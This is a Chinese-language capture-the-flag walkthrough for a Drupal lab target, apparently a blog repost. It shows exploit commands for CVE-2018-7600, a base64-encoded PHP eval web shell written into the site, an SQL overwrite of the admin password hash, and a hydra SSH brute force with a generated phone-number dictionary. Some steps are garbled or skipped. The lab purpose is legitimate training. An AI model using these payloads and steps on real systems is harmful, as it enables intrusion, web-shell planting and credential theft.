目录
赛题:综合靶场渗透Drupalweb服务: http://114.132.230.222:14180/ssh服务ip:114.132.230.222, ssh服务端口14122
1、flag1的pyload:
2、寻找内网IP
3、mysql_pwd
4、mysqlflag的获取方式
5、flag4 webadmin
6、flag4没有任何描述,需要寻找,在home目录下,找到flag4.txt
7、bmaqflag翻一些常见的目录,拿下flag:
8、pwd_of_flag4提示the flag is ssh password of flag4,此密码一般字典没有,需要找到提示信息。
9、thefinalflag
10、使用公私钥的方式进一步获得完整的root
11、查找mysql下root的hash值
12、最后一个flag值为whsec{Apples}
赛题:综合靶场渗透Drupal
web服务: http://114.132.230.222:14180/
ssh服务ip:114.132.230.222, ssh服务端口14122
http://114.132.230.222:14180/flag1.txt
Every good CMS needs a config file - and so do you. whsec{1552c03e78d38d5005d4ce7b8018addf}2、寻找内网IP
打开kali,利用一个漏洞脚本drupa7-CVE-2018-7600.py,对靶机进行探测,whoami得到www-data,然后执行“ifconfig”,发现没有回显
python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "whoami" python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "ifconfig"
这种情况是因为ifconfig不在 www-data路径下,www-data找不到这个ifconfig路径
┌──(rootkali)-[/home/kali/Desktop] └─# which ifconfig /usr/sbin/ifconfig
利用这个路径,进行ifconfig进行探测
┌──(rootkali)-[/home/kali/Desktop] └─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "/sbin/ifconfig"
得到如下:
inner_ip的flag为:whsec{192.168.1.8}
3、mysql_pwd百度搜索drupal的mysql配置文件
/sites/default/settings.php
使用如下命令,查看drupal数据库配置文件
┌──(rootkali)-[/home/kali/Desktop] └─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "cat sites/default/settings.php"
得到配置信息:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
mysql_pwd的flag为whsec{R0ck3t}
4、mysqlflag的获取方式最好的方式就是写个一句话木马,然后用蚁剑连接数据库,找到mysqlflag,思路是找到一个可写目录。
┌──(rootkali)-[/home/kali/Desktop] └─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "ls -al"
drwxr-xr-x 9 www-data www-data 4096 Dec 10 20:35 .
drwxr-xr-x 12 root root 4096 Feb 19 2019 ..
-rw-r--r-- 1 www-data www-data 174 Nov 21 2013 .gitignore
-rw-r--r-- 1 www-data www-data 5767 Nov 21 2013 .htaccess
-rwxrwxrwx 1 www-data www-data 30 Dec 10 20:24 1209.php
-rw-r--r-- 1 www-data www-data 1481 Nov 21 2013 COPYRIGHT.txt
-rw-r--r-- 1 www-data www-data 1451 Nov 21 2013 INSTALL.mysql.txt
-rw-r--r-- 1 www-data www-data 1874 Nov 21 2013 INSTALL.pgsql.txt
-rw-r--r-- 1 www-data www-data 1298 Nov 21 2013 INSTALL.sqlite.txt
-rw-r--r-- 1 www-data www-data 17861 Nov 21 2013 INSTALL.txt
-rwxr-xr-x 1 www-data www-data 18092 Nov 1 2013 LICENSE.txt
-rw-r--r-- 1 www-data www-data 8191 Nov 21 2013 MAINTAINERS.txt
-rw-r--r-- 1 www-data www-data 5376 Nov 21 2013 README.txt
-rw-r--r-- 1 www-data www-data 9642 Nov 21 2013 UPGRADE.txt
-rw-r--r-- 1 www-data www-data 6604 Nov 21 2013 authorize.php
-rw-r--r-- 1 www-data www-data 720 Nov 21 2013 cron.php
-rw-r--r-- 1 www-data www-data 92 May 13 2021 flag1.txt
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 includes
-rw-r--r-- 1 www-data www-data 529 Nov 21 2013 index.php
-rw-r--r-- 1 www-data www-data 703 Nov 21 2013 install.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:35 llj.php
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 misc
drwxr-xr-x 42 www-data www-data 4096 Nov 21 2013 modules
-rwxrwxrwx 1 www-data www-data 1056 Dec 10 20:25 pq_14444.sh
drwxr-xr-x 5 www-data www-data 4096 Nov 21 2013 profiles
-rw-r--r-- 1 www-data www-data 1561 Nov 21 2013 robots.txt
drwxr-xr-x 2 www-data www-data 4096 Nov 21 2013 scripts
-rw-r--r-- 1 www-data www-data 34 Dec 10 20:27 sgcc.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:33 shellhanliang.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:35 shellweiweix666.php
-rw-r--r-- 1 www-data www-data 29 Dec 10 20:31 shellxw.phpin
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:26 shellyanzong.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:33 shellylj.php
drwxr-xr-x 4 www-data www-data 4096 Nov 21 2013 sites
drwxr-xr-x 7 www-data www-data 4096 Nov 21 2013 themes
-rw-r--r-- 1 root root 93 Jun 25 07:14 tips_look_at_me.txt
-rw-r--r-- 1 www-data www-data 19941 Nov 21 2013 update.php
-rw-r--r-- 1 www-data www-data 2178 Nov 21 2013 web.config
-rw-r--r-- 1 www-data www-data 417 Nov 21 2013 xmlrpc.php
-rw-r--r-- 1 www-data www-data 30 Dec 10 20:22 zwd.php
就先用includes这个目录写一个一句话木马吧,一句话木马:
用kali进行base64编码,注意base64编码的时候用单引号:
┌──(rootkali)-[/home/kali/Desktop] └─# echo ''|base64 127 ⨯ PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOyA/Pgo=
然后,用kali写入到includes目录下:-d意思为解码,>意思为导向
echo PD9waHAgCkBldmFsKCRfUE9TVFtjbWRdKTsKIAo/Pg==|base64 -d >/var/www/includes/cmd.php
┌──(rootkali)-[/home/kali/Desktop] └─# python drupa7-CVE-2018-7600.py http://114.132.230.222:14180/ -c "echo PD9waHAgCkBldmFsKCRfUE9TVFtjbWRdKTsKIAo/Pg==|base64 -d >/var/www/includes/cmd1.php"
紧接着用蚁剑连接
然后连接数据库
得到mysqlfalg:whsec{279a967961adfb3557bd15ea20b5d4f8}
5、flag4 webadmin提示:admin是爆破不了的。然后百度一下drupal密码的加密方式,百度不出来,然后继续挺老实的吧。
drupal自带的password-hash.sh加密drupal,存在users这个表下面,打开users这个表,查单admin的密码
因密码是加密过后的,不容易破解,所以我的思路是要修改admin的密码,用如下方法修改。自己设置一个密码,然后加密后修改。
找到加密算法文件password-hash.sh,这个文件在这个目录下:/var/www/scriptspassword-hash.sh,
这个文件是一个php文件,用php执行一下
php /var/www/scripts/password-hash.sh drupal >pwd.txt
如果报错没有includes文件,需要去上级目录拷贝至本目录
cp -R includes ./scripts/
得到加密后的秘钥
password: drupal hash: $S$DvUoRrx0BW.PyseWVlz84zSlmfdCuqN4ki31yBh5bqspDWxnehk8
连接数据库后,用以下sql语句将hash值进行更新
update users set pass="$S$DvUoRrx0BW.PyseWVlz84zSlmfdCuqN4ki31yBh5bqspDWxnehk8" where name="admin";
如果提示登录次数频繁,还需要用到以下语句:
TRUNCATE flood
最后登录成功,拿下flag:whsec{3e821652054b469cb19403fbc3f45bde}
6、flag4没有任何描述,需要寻找,在home目录下,找到flag4.txt
拿下flag:whsec{00e6f657aa50b769a408d72396f61555}
(www-data:/home/flag4) $ cat flag4.txt Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is? whsec{00e6f657aa50b769a408d72396f61555}7、bmaqflag翻一些常见的目录,拿下flag:
(www-data:/) $ cat bmaqflag whsec{95ed83bef92340184a099e7b08df2740}8、pwd_of_flag4提示the flag is ssh password of flag4,此密码一般字典没有,需要找到提示信息。
刚拿到shell的时候,出现一个提示文件:
(www-data:/var/www) $ cat tips_look_at_me.txt The password of user "flag4" is a mobile phone number. 1368xxx3247,you need to find out!
这时候,需要用python生成一个字典文件
#coding=utf-8 with open('C:\Users\hao\Desktop\dict.txt', 'w') as f: for a in range(0,10): for b in range(0,10): for c in range(0,10): pwd='1368'+str(a)+str(b)+str(c)+'3247' f.write(pwd) f.write("n") # 1368xxx3247
然后用kali的hydra进行爆破
┌──(rootkali)-[/home/kali/Desktop] └─# hydra 114.132.230.222 -l flag4 -P dict.txt ssh -s 14122 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-10 02:47:06 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task [DATA] attacking ssh://114.132.230.222:14122/ [14122][ssh] host: 114.132.230.222 login: flag4 password: 13680313247 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-10 02:47:12
很快就爆破出来,得到密码为:13680313247。flag为:whsec{13680313247}
用flag4就可以登录了。
┌──(rootkali)-[/home/kali/Desktop] └─# ssh [email protected] -p 14122 130 ⨯ [email protected]'s password: Permission denied, please try again. [email protected]'s password: Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doccopyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Dec 11 19:15:54 2021 from 192.168.26.1 root@DC-1:~# id uid=0(root) gid=0(root) groups=0(root) root@DC-1:~#11、查找mysql下root的hash值
1)、用如下三条命令进入mysql
mysql -udbuser -pR0ck3t mysql> select @@datadir; +-----------------+ | @@datadir | +-----------------+ | /var/lib/mysql/ | /var/lib/mysql/mysql/mysqluser#
2)、创建mysqluser后,将user文件复制,然后打包放置www根目录文件夹下面。
root@DC-1:/var/lib/mysql/mysql/mysqluser# tar --help|grep tar root@DC-1:/var/lib/mysql/mysql# mv mysqluser.tar /var/www
3、在www根目录下下载
http://114.132.230.222:14180/mysqluser.tar
4、复制到phpstudy下面的目录中D:phpStudyMySQLdata
3、用phpstudy中的mysql工具,mysql命令行打开,使用如下命令得到mysqlroot的hash值:
show databases; use mysqluser; select * from mysqluser; | localhost | root | *822B993B089B6BC20A6AED2EF00E6003ED3A1F13
4、在线解密,得到flag值为whsec{822B993B089B6BC20A6AED2EF00E6003ED3A1F13}
12、最后一个flag值为whsec{Apples} 结束。md5在线解密破解,md5解密加密https://www.cmd5.com/
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)